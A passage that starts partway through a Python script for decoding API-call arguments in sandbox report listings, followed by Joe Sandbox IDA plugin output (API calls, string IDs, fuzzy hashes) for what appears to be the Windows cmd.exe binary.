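            return None
        try:
            return int(self.args[i], 16)
        except ValueError:
            return None


def parse_listing(text: str) -> List[ApiCall]:
    """Turn the bullet lines of an 'APIs' block into ApiCall records; skip headers."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Names of the set bits, plus any remainder the table does not know as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~reduce(or_, table, 0)
    if leftover:
        names.append(f"0x{leftover:X}")
    return names


def name_of(value: Optional[int], table: Dict[int, str]) -> str:
    return "?" if value is None else table.get(value, f"0x{value:X}")


def summarize(calls: List[ApiCall]) -> List[str]:
    """One finding per call whose raw slots carry a decodable security constant."""
    out: List[str] = []
    names = [c.api for c in calls]
    for i, c in enumerate(calls):
        if c.api == "CreateProcessW":           # slot 4 = bInheritHandles, slot 5 = dwCreationFlags
            flags = decode_flags(c.slot(5) or 0, CREATION_FLAGS)
            out.append(f"CreateProcessW@{c.ref:08X}: bInheritHandles={c.slot(4)} "
                       f"dwCreationFlags={'|'.join(flags) or '0'}")
        elif c.api == "UpdateProcThreadAttribute":  # slot 2 = Attribute, slot 4 = cbSize
            out.append(f"UpdateProcThreadAttribute@{c.ref:08X}: "
                       f"{name_of(c.slot(2), PROC_THREAD_ATTRIBUTES)} cbSize={c.slot(4)}")
        elif c.api == "TerminateProcess" and tuple(names[max(0, i - 3):i + 1]) == SECURITY_FAILURE_SEQ:
            # GetCurrentProcess takes no arguments: the slot the report shows for it is the
            # uExitCode already pushed for this TerminateProcess (x86 stdcall push order).
            code = calls[i - 1].slot(0)
            out.append(f"TerminateProcess@{c.ref:08X}: CRT __raise_securityfailure, "
                       f"exit code {name_of(code, NTSTATUS)}")
    return out


if __name__ == "__main__":
    for finding in summarize(parse_listing(SAMPLE)):
        print(finding)
```

Run it on the text of any "APIs" block pasted from the report; lines that are not call bullets ("APIs", "Strings", "Memory Dump Source") are ignored. Treat every decoded slot as a hint to confirm in the disassembly at the given ref, since the report does not verify argument alignment.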
APIs
• memset.MSVCRT ref: 00194781
  • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
• _get_osfhandle.MSVCRT ref: 001947E4
• GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 001947EC
• _get_osfhandle.MSVCRT ref: 001947FD
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00194805
  • Part of subcall function 0019A16C: _close.MSVCRT ref: 0019A19B
• _get_osfhandle.MSVCRT ref: 00194832
• ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 0019483A
• ??_V@YAXPAX@Z.MSVCRT(?), ref: 00194871
• SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000001), ref: 001A8120
• memmove.MSVCRT(?,?,?), ref: 001A8191
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,?,00000000), ref: 001A8328
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001A832F
  • Part of subcall function 0019DD98: _get_osfhandle.MSVCRT ref: 0019DDA3
  • Part of subcall function 0019DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001AC050), ref: 0019DDAD
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: File_get_osfhandle$memset$ConsoleHandlePathPointerReadSearchSizeTypeWrite_closememmove
• String ID: DPATH
• API String ID: 2545859659-2010427443
• Opcode ID: 4c03db9770e4e169076921815dd997a081cd8ea4ae89c0a810add954e5f22ae1
• Instruction ID: 1991366b62180c0a055fa8bd7b35540d7cfa7e25754fde002cdfe9bf5e257350
• Opcode Fuzzy Hash: 4c03db9770e4e169076921815dd997a081cd8ea4ae89c0a810add954e5f22ae1
• Instruction Fuzzy Hash: DDF1EE75A093419FDB24DF24C848B6BBBE8FF89710F144A2EF48993290DB70D945CB92
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmp$iswspace
                                                                                                                                                                                                                          • String ID: =,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                                                                                                                                          • API String ID: 759518647-875390083
                                                                                                                                                                                                                          • Opcode ID: e684a43dd9ed902db4962341e3b9af2619bab4b798529cafea77be5b1ac765da
                                                                                                                                                                                                                          • Instruction ID: 7b6a9b199f19a0d237555727bbafd750fd5d3f56795829a7f714a0099cea7c63
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e684a43dd9ed902db4962341e3b9af2619bab4b798529cafea77be5b1ac765da
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35A1F1392453129BDF38AB69AC0AB3B33A4AF82714F54042FF543879D1DBF49881C766
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: iswdigit$iswspacewcschr$_setjmp3
                                                                                                                                                                                                                          • String ID: ()|&=,;"$=,;$@$Ungetting: '%s'
                                                                                                                                                                                                                          • API String ID: 684130364-3872429996
                                                                                                                                                                                                                          • Opcode ID: cf2b7f90f110eaf8a01e3fda28a5653bfaf9c352fe035874c85caba4db85227e
                                                                                                                                                                                                                          • Instruction ID: 94941047751b872f0d6af4b157ba6d41e2358d7c144fd29a28b9fd2d383b9250
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf2b7f90f110eaf8a01e3fda28a5653bfaf9c352fe035874c85caba4db85227e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4E124B2D012119BCF248F69F98577A7BA0BF25381F684137EC46D7291E334DE8187A6
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,001BE590,00002000,?,001D8BF0,00000000,?,?,00198F0D), ref: 0019EC51
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0019EC77
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0019EC8D
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0019ECA3
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0019ECB9
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0019ECCF
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0019ECE5
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0019ECF7
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0019ED0D
                                                                                                                                                                                                                            • Part of subcall function 00199310: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,001BE590,?,00002000), ref: 00199342
                                                                                                                                                                                                                            • Part of subcall function 00199310: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00199356
                                                                                                                                                                                                                            • Part of subcall function 00199310: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 0019936A
                                                                                                                                                                                                                            • Part of subcall function 00199310: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 0019937E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
                                                                                                                                                                                                                          • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                                                                                                                                          • API String ID: 2447294730-2301591722
                                                                                                                                                                                                                          • Opcode ID: c99c35732640353fa0ecea76ad6d6b77dce8e7ead053f1bc4a6cea128f4b8e34
                                                                                                                                                                                                                          • Instruction ID: 7fd71489ceade89385f4f4a6ea1aa6a9d2a808fc8029a595dcda914e48e8bef9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c99c35732640353fa0ecea76ad6d6b77dce8e7ead053f1bc4a6cea128f4b8e34
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5031E73620A302BBEF18D775EC1EABB27DDFF46724B28441AF506D14D0EFA49540826B
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 001B9CC8
                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,?), ref: 001B9D22
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 001B9D2A
                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001B9D3A
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001B9D50
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 001B9D58
                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001B9D68
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001B9D7C
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 001B9DDB
                                                                                                                                                                                                                          • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 001B9DE2
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 001B9DF2
                                                                                                                                                                                                                          • towupper.MSVCRT ref: 001B9E13
                                                                                                                                                                                                                            • Part of subcall function 0019A16C: _close.MSVCRT ref: 0019A19B
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 001B9E6A
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 001B9E9B
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 001B9EA9
                                                                                                                                                                                                                            • Part of subcall function 0019DD98: _get_osfhandle.MSVCRT ref: 0019DDA3
                                                                                                                                                                                                                            • Part of subcall function 0019DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001AC050), ref: 0019DDAD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                                                                                                                          • String ID: <noalias>$CMD.EXE
                                                                                                                                                                                                                          • API String ID: 2015057810-1690691951
                                                                                                                                                                                                                          • Opcode ID: ac46d63a787d201c64c619777e7c003bb1f45bec2c660d8a6cae1c957fe13c85
                                                                                                                                                                                                                          • Instruction ID: 3c21fab0cbbbffebc6a0aefb8d7d39f43634671ad5ee56aa87548291cd648278
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac46d63a787d201c64c619777e7c003bb1f45bec2c660d8a6cae1c957fe13c85
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C581E472A01214ABCF14DFB4DC45AEEBBB9AF49720F14412AF902E7290EB759D42C761
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00199A11: _get_osfhandle.MSVCRT ref: 00199A1C
                                                                                                                                                                                                                            • Part of subcall function 00199A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0019793A,00000104,?), ref: 00199A2B
                                                                                                                                                                                                                            • Part of subcall function 00199A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374,-00000001), ref: 00199A47
                                                                                                                                                                                                                            • Part of subcall function 00199A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374), ref: 00199A56
                                                                                                                                                                                                                            • Part of subcall function 00199A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374), ref: 00199A61
                                                                                                                                                                                                                            • Part of subcall function 00199A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374,-00000001), ref: 00199A6A
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00197943
                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374,-00000001), ref: 00197951
                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,001D0AF0,000000A0,00000000,00000000,00000000,?,00000104,?), ref: 001979BE
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,00000104,?), ref: 00197A1C
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00197A27
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2173784998-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,?), ref: 001B2931
                                                                                                                                                                                                                          • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 001B2998
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentFormatMessageThread
                                                                                                                                                                                                                          • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                                                                                                                          • API String ID: 2411632146-3173542853
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,001AB7DB,0000000C,00000004,00000080,00000000), ref: 001A05FF
                                                                                                                                                                                                                          • _open_osfhandle.MSVCRT ref: 001A0613
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001A0663
                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,?,?), ref: 001A0695
                                                                                                                                                                                                                          • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 001A06D3
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 001A06FB
                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 001A0717
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 001AE89D
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CreatePointer$ReadSize_open_osfhandle_wcsicmp
                                                                                                                                                                                                                          • String ID: con
                                                                                                                                                                                                                          • API String ID: 58404892-4257191772
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BC62E
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BC656
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 001BC6C7
                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 001BC6E6
                                                                                                                                                                                                                          • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 001BC72A
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001BC747
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001BC76C
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001BC794
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 001BC7B3
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 001BC7C5
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                                                                                                                                          • String ID: CSVFS$NTFS$REFS
                                                                                                                                                                                                                          • API String ID: 3510147486-2605508654
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                                          • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                                                                                                                                                          • API String ID: 2081463915-3124875276
                                                                                                                                                                                                                          • Opcode ID: e5c1461fba14532c764f83e6fd83e9766a294d6e24b59ee5f6149cb0dea645df
                                                                                                                                                                                                                          • Instruction ID: 5f77a4f88654c2b869624bbf7ebabff3fe9df3bf7e0a4600ce320f218fbf5468
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5c1461fba14532c764f83e6fd83e9766a294d6e24b59ee5f6149cb0dea645df
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9412E312053069BDF286B58E85577A37A4EF62728F68042FE102965D0EFF6D485C752
APIs
• longjmp.MSVCRT(001D0A70,000000FF,00000000,?,00000001,?,?,?,001A5833,?, /D /c",?,?,?,00000000,?), ref: 001B1271
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: longjmp
• String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
• API String ID: 1832741078-366822981
• Opcode ID: 9cbc02fa3c3093f63f94b12997c81297ab1f8da404f055e2cef55e1619885b6b
• Instruction ID: 7ddc6f85ae7fe6afddc880538f09da7e15fc4c9b2f3b19734b886d9120d54e7b
• Opcode Fuzzy Hash: 9cbc02fa3c3093f63f94b12997c81297ab1f8da404f055e2cef55e1619885b6b
• Instruction Fuzzy Hash: 3BA11478704604FBCF28DF94C9A48EE7B63FB56394BA18116F406AB650CB70DE91DB81
APIs
• FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,00000000,00000000,001D0AF0,00002000,00000000,00000000,00000000,00000000), ref: 00197ED4
  • Part of subcall function 0019A62F: wcschr.MSVCRT ref: 0019A635
• FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,00000000,00000000,001D0AF0,00002000,?), ref: 00197F16
• _ultoa.MSVCRT ref: 001AAFC9
• GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 001AAFDE
• MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 001AAFF3
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
• String ID: Application$System
• API String ID: 3538039442-3455788185
• Opcode ID: 7fe7075536b7e0f1f7c6481d7fc659769560d59d2312b5b067b02478c55c0284
• Instruction ID: 0df4276ca2f4ebed7d1f9327d7c3f9abde4ccf37874db7167405b3d29ef0ca20
• Opcode Fuzzy Hash: 7fe7075536b7e0f1f7c6481d7fc659769560d59d2312b5b067b02478c55c0284
• Instruction Fuzzy Hash: F141B371745315BBDB14DB649C89FAE7BA9EF49B41F60002AF506EB2C0D7709D40C761
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: memsetwcschr$_wcsicmpiswspace
• String ID: :.\$=,;$=,;+/[] "
• API String ID: 1913572127-843887632
• Opcode ID: 314571e91970233c781fc53358d86f9d939f6c7ddc98f12cda5a324eb7c07a7f
• Instruction ID: 05933663a3bff7f8527622ab28ebe30b288430dec25f459ea0289cb0ce9a9171
• Opcode Fuzzy Hash: 314571e91970233c781fc53358d86f9d939f6c7ddc98f12cda5a324eb7c07a7f
• Instruction Fuzzy Hash: D9A1F334A05214DBDF28CBA8EC88BBA77F1BF45314F150199E80BA76E1D7709E85CB51
APIs
  • Part of subcall function 00199E8E: iswspace.MSVCRT ref: 00199E9E
• wcsrchr.MSVCRT ref: 001B5406
• wcschr.MSVCRT ref: 001B541C
• wcsrchr.MSVCRT ref: 001B544C
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 001B546B
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001B547B
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001B5497
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 001B549F
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001B54B3
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 001B54D4
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 001B5501
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001B5557
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 001B5578
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
